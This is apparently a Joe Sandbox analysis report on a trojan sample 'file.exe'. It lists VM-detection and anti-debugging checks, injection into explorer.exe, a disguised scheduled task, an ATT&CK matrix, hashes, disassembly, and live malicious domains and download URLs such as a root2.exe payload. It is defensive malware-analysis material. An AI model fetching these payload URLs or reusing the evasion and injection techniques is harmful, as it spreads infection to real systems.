            Source: explorer.exe, 00000001.00000000.358792757.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000001.00000000.358870858.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
            Source: explorer.exe, 00000001.00000000.380325701.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
            Source: explorer.exe, 00000001.00000000.329406422.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000001.00000000.360871692.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
            Source: explorer.exe, 00000001.00000000.358792757.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
            Source: explorer.exe, 00000001.00000000.359904103.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EBC4.exe, 0000000C.00000002.515660942.0000000002E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8

            Anti Debugging

            Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\gfgsrbs System information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0226092B mov eax, dword ptr fs:[00000030h] 0_2_0226092B
            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02260D90 mov eax, dword ptr fs:[00000030h] 0_2_02260D90
            Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_023E80A3 push dword ptr fs:[00000030h] 5_2_023E80A3
            Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\gfgsrbs Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe File created: gfgsrbs.1.dr
            Source: C:\Windows\explorer.exe Domain query: thepokeway.nl
            Source: C:\Windows\explorer.exe Domain query: freeshmex.at
            Source: C:\Windows\explorer.exe Network Connect: 123.253.32.170 80
            Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\gfgsrbs Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\gfgsrbs Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 46319C8
            Source: C:\Users\user\AppData\Roaming\gfgsrbs Thread created: unknown EIP: 4A619C8
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.329316719.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000001.00000000.348621361.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.318266045.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.368523478.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\B87E.exe Code function: 5_2_004B544E GetLocalTime, 5_2_004B544E

            Stealing of Sensitive Information

            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            32
            Process Injection
            11
            Masquerading
            1
            Input Capture
            1
            System Time Discovery
            Remote Services1
            Input Capture
            Exfiltration Over Other Network Medium21
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            141
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Query Registry
            Remote Desktop Protocol11
            Archive Collected Data
            Exfiltration Over Bluetooth11
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)32
            Process Injection
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Hidden Files and Directories
            NTDS141
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureScheduled Transfer124
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets3
            Process Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Rundll32
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Software Packing
            DCSync14
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            File Deletion
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Behavior Graph: ID 753427, Sample: file.exe, Start date: 24/11/2022, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label
            file.exe | 100% | Joe Sandbox ML |

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\gfgsrbs | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\EBC4.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\B87E.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp | 24% | ReversingLabs | Win32.Trojan.Lazy
            C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp | 35% | Virustotal |

            Source | Detection | Scanner | Label
            7.2.EBC4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.2.B87E.exe.25d0e67.1.unpack | 100% | Avira | HEUR/AGEN.1215461
            4.3.gfgsrbs.7b0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            12.2.EBC4.exe.2d5112c.2.unpack | 100% | Avira | TR/Patched.Ren.Gen7
            0.3.file.exe.2270000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.3.B87E.exe.26f0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
            12.2.EBC4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            4.2.gfgsrbs.7a0e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            4.2.gfgsrbs.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            0.2.file.exe.2260e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            5.2.B87E.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2

            Source | Detection | Scanner | Label
            thepokeway.nl | 5% | Virustotal |
            freeshmex.at | 19% | Virustotal |

            Source | Detection | Scanner | Label
            http://piratia.su/tmp/ | 100% | URL Reputation | malware
            https://thepokeway.nl/upload/index.php | 0% | URL Reputation | safe
            http://cracker.biz/tmp/ | 0% | URL Reputation | safe
            http://freeshmex.at/tmp/ | 0% | URL Reputation | safe
            http://123.253.32.170/root2.exe | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            thepokeway.nl | 5.135.247.111 | true | true | | unknown
            freeshmex.at | 190.140.74.43 | true | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://piratia.su/tmp/ | true | URL Reputation: malware | unknown
            https://thepokeway.nl/upload/index.php | false | URL Reputation: safe | unknown
            http://cracker.biz/tmp/ | true | URL Reputation: safe | unknown
            http://freeshmex.at/tmp/ | true | URL Reputation: safe | unknown
            http://123.253.32.170/root2.exe | true | URL Reputation: safe | unknown
            http://piratia-life.ru/tmp/ | false | | high
              IP | Domain | Country | ASN | ASN Name | Malicious
              178.31.176.42 | unknown | Sweden | 2119 | TELENOR-NEXTELTelenorNorgeASNO | false
              109.102.255.230 | unknown | Romania | 9050 | RTDBucharestRomaniaRO | false
              5.135.247.111 | thepokeway.nl | France | 16276 | OVHFR | true
              211.40.39.251 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | false
              211.171.233.129 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | false
              123.253.32.170 | unknown | Malaysia | 9924 | TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi | true
              95.107.163.44 | unknown | Albania | 47394 | ASC-AL-ASAL | false
              211.53.230.67 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | false
              190.140.74.43 | freeshmex.at | Panama | 18809 | CableOndaPA | true
              IP
              192.168.2.1
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:753427
              Start date and time:2022-11-24 20:11:10 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 4s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:file.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winEXE@9/5@35/10
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 70.7% (good quality ratio 58.1%)
              • Quality average: 46%
              • Quality standard deviation: 29.6%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 36
              • Number of non-executed functions: 92
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Time | Type | Description
              20:13:00 | Task Scheduler | Run new task: Firefox Default Browser Agent 52C9416EC30B0AB4 path: C:\Users\user\AppData\Roaming\gfgsrbs
              20:13:24 | API Interceptor | 60x Sleep call for process: rundll32.exe modified
              20:13:39 | API Interceptor | 1x Sleep call for process: EBC4.exe modified
              Match | Associated Sample Name / URL | Detection
              C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp | file.exe | malicious
               | file.exe | malicious
               | file.exe | malicious
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1041408
                    Entropy (8bit):7.918015264621188
                    Encrypted:false
                    SSDEEP:24576:K/J3qfaq1RXzqGA+PF6ZbOQVIZc77oReV2U6JjgtA1/lGaee:K/Ja54TS6ZyQKk7cJjJJlGa
                    MD5:1BD9FB4ADE498938E6432D6C5D1E23A5
                    SHA1:909ECEC41F837A402EE4EF43D8B9F6B06A5A8AAF
                    SHA-256:12B8B5BFDE4092B4248ACCC682098222420EE6A0B6DFE89EB268F7FCF8CF00FB
                    SHA-512:EA02AB5EC0BDEABA4E897E5E1E50CCF27AB392AC859348CDF1CAAAF90C7C10F1E99CDD01317F36479CB600B9FE2189F34B59AFC822071EC4C7EA989F8F99CDA5
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):520192
                    Entropy (8bit):7.765713315963878
                    Encrypted:false
                    SSDEEP:6144:5q6OLJ51HLLQrTYeW0w8Y2hm/UchHJ10kiygcz0CkcScVwAjS0bgF8nlctP4:5qJX1H4rUelw4En0V80WSmjWF8nWt
                    MD5:F06F222962C48BB7D822AC0FCD14CFD2
                    SHA1:0866BE2E6D97E71DEF6DCED9FE5DC7623558DCAD
                    SHA-256:F687250C7F49AAFF9787D9202CD13F5E159220D9AE613B335ED72A76FADFA03F
                    SHA-512:F29B4F4B64394B127F939466AF5D189408C6D296E94469000E72690129753FB0C1232B925C2C50FC252E273E503DEC984EE95BECD267F897B5E57493DD7F6412
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Process:C:\Users\user\AppData\Local\Temp\B87E.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):785408
                    Entropy (8bit):6.878292814763175
                    Encrypted:false
                    SSDEEP:12288:8jrCotmFXRwupVoGK25MAaSOWfvjCqanOxku3lle2kKE:AzmFB3oG1aSbvGqanwRro
                    MD5:D8CA174A8F3F0C225429E1BE1CB6D304
                    SHA1:0F2E738B1A35B6072E1D23894468E45FA7DEE750
                    SHA-256:3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
                    SHA-512:DBF999A9F0399B3CBF93484F2E665E3BEB4DE369DACF4678C7B7B3FF06F45C42879C544C2404D85B88FE3AAACF117A1E28ECB68EE7EA2553B736BAD03619E527
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 24%
                    • Antivirus: Virustotal, Detection: 35%, Browse
                    Joe Sandbox View:
                    • Filename: file.exe, Detection: malicious, Browse
                    • Filename: file.exe, Detection: malicious, Browse
                    • Filename: file.exe, Detection: malicious, Browse
                    Reputation:low
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):192000
                    Entropy (8bit):6.98989950872948
                    Encrypted:false
                    SSDEEP:3072:hsKq2z/YFBDK+1L8pOov9vl5izTyHnbACodEdE53iiy2:tqG6LaO6QTak/dKEFii1
                    MD5:44C87D3BC316EEFE4DCBF66AFED72ABC
                    SHA1:96BDE412EF761B4D53506AE4ED2999BC9DCAF137
                    SHA-256:731E22BE2A6B39304919DC24B750A720B23A0F1ED996A9B74CF0B088DE6144B1
                    SHA-512:2449DA42CF169EF2A9E01ADE64DD8C52AB6037CE9A726597D88F5EEAA726B06F77BC08612AAECCF9354CD23BEE879B1724F222E24C8BAB25FEF7E75A8BF0E0C1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.98989950872948
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.53%
                    • InstallShield setup (43055/19) 0.43%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:192000
                    MD5:44c87d3bc316eefe4dcbf66afed72abc
                    SHA1:96bde412ef761b4d53506ae4ed2999bc9dcaf137
                    SHA256:731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
                    SHA512:2449da42cf169ef2a9e01ade64dd8c52ab6037ce9a726597d88f5eeaa726b06f77bc08612aaeccf9354cd23bee879b1724f222e24c8bab25fef7e75a8bf0e0c1
                    SSDEEP:3072:hsKq2z/YFBDK+1L8pOov9vl5izTyHnbACodEdE53iiy2:tqG6LaO6QTak/dKEFii1
                    TLSH:CC14BF353680D072C59E65708C60EAA1AB7DAA3155B885377BA80B7E5F703D0AF3634F
                    Icon Hash:c8d0d8e0f8e0f0e0
                    Entrypoint:0x406fe6
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x60DF08C1 [Fri Jul 2 12:38:25 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:5a0f5eee1a1d8df02fd40c6cf3174a3d
                    Instruction
                    call 00007F9BE0977256h
                    jmp 00007F9BE096F8DEh
                    mov ecx, dword ptr [esp+04h]
                    test ecx, 00000003h
                    je 00007F9BE096FA86h
                    mov al, byte ptr [ecx]
                    add ecx, 01h
                    test al, al
                    je 00007F9BE096FAB0h
                    test ecx, 00000003h
                    jne 00007F9BE096FA51h
                    add eax, 00000000h
                    lea esp, dword ptr [esp+00000000h]
                    lea esp, dword ptr [esp+00000000h]
                    mov eax, dword ptr [ecx]
                    mov edx, 7EFEFEFFh
                    add edx, eax
                    xor eax, FFFFFFFFh
                    xor eax, edx
                    add ecx, 04h
                    test eax, 81010100h
                    je 00007F9BE096FA4Ah
                    mov eax, dword ptr [ecx-04h]
                    test al, al
                    je 00007F9BE096FA94h
                    test ah, ah
                    je 00007F9BE096FA86h
                    test eax, 00FF0000h
                    je 00007F9BE096FA75h
                    test eax, FF000000h
                    je 00007F9BE096FA64h
                    jmp 00007F9BE096FA2Fh
                    lea eax, dword ptr [ecx-01h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    lea eax, dword ptr [ecx-02h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    lea eax, dword ptr [ecx-03h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    lea eax, dword ptr [ecx-04h]
                    mov ecx, dword ptr [esp+04h]
                    sub eax, ecx
                    ret
                    cmp ecx, dword ptr [0042B970h]
                    jne 00007F9BE096FA64h
                    rep ret
                    jmp 00007F9BE097724Dh
                    push eax
                    push dword ptr fs:[00000000h]
                    lea eax, dword ptr [esp+0Ch]
                    sub esp, dword ptr [esp+0Ch]
                    push ebx
                    push esi
                    push edi
                    mov dword ptr [eax], ebp
                    mov ebp, eax
                    mov eax, dword ptr [0042B970h]
                    xor eax, ebp
                    push eax
                    push dword ptr [ebp-04h]
                    mov dword ptr [ebp+00h], 00000000h
                    Programming Language:
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [C++] VS2008 build 21022
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a05c | 0x64 | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x249000 | 0x2ee8 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1270 | 0x1c | .text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3c50 | 0x40 | .text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x220 | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x19cf4 | 0x19e00 | False | 0.5226637983091788 | data | 6.3440620232767975 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data | 0x1b000 | 0x22dac8 | 0x11c00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x249000 | 0x2ee8 | 0x3000 | False | 0.639892578125 | data | 5.694966696037735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0x2491f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x2498b8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x249e20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x24aec8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x24b850 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Raeto-Romance | Switzerland
                    RT_ACCELERATOR | 0x24bd08 | 0x98 | data | Raeto-Romance | Switzerland
                    RT_GROUP_ICON | 0x24bcb8 | 0x4c | data | Raeto-Romance | Switzerland
                    RT_VERSION | 0x24bda0 | 0x148 | x86 executable not stripped | |
                    DLL | Import
                    KERNEL32.dll | WriteConsoleInputA, EnumDateFormatsA, OpenMutexA, GetConsoleAliasExesLengthW, CopyFileExA, ReadConsoleOutputCharacterA, GetEnvironmentStrings, FreeUserPhysicalPages, QueryDosDeviceA, EnumCalendarInfoExA, GetProcessPriorityBoost, LocalSize, AddConsoleAliasW, CreateFileW, GetMailslotInfo, GetWindowsDirectoryA, GetModuleHandleW, VirtualFree, CreateDirectoryExA, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerW, GetVersionExA, SearchPathA, RequestWakeupLatency, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotW, BuildCommDCBAndTimeoutsA, GetProcAddress, GetModuleHandleA, LocalAlloc, FindNextFileA, TerminateThread, GetCommandLineW, FindFirstChangeNotificationA, VerifyVersionInfoA, DeleteTimerQueue, FindFirstVolumeA, GlobalFlags, GetTickCount, GetACP, GlobalWire, GetTapeParameters, HeapWalk, GetConsoleTitleA, InterlockedCompareExchange, EnumCalendarInfoA, GetNamedPipeHandleStateW, InterlockedDecrement, SetCalendarInfoA, TerminateProcess, MoveFileA, AddAtomW, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointA, VirtualAlloc, SetConsoleActiveScreenBuffer, GetCPInfo, GetProcessIoCounters, GlobalFindAtomA, CreateFileA, CloseHandle, GetVolumeInformationA, EnumSystemCodePagesA, MoveFileWithProgressA, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, RtlUnwind, GetLastError, DeleteFileA, GetStartupInfoW, HeapAlloc, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetOEMCP, IsValidCodePage, HeapSize, LoadLibraryA, InitializeCriticalSectionAndSpinCount, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, ReadFile
                    USER32.dll | GetComboBoxInfo, GetMessageExtraInfo, GetListBoxInfo
                    GDI32.dll | GetBoundsRect
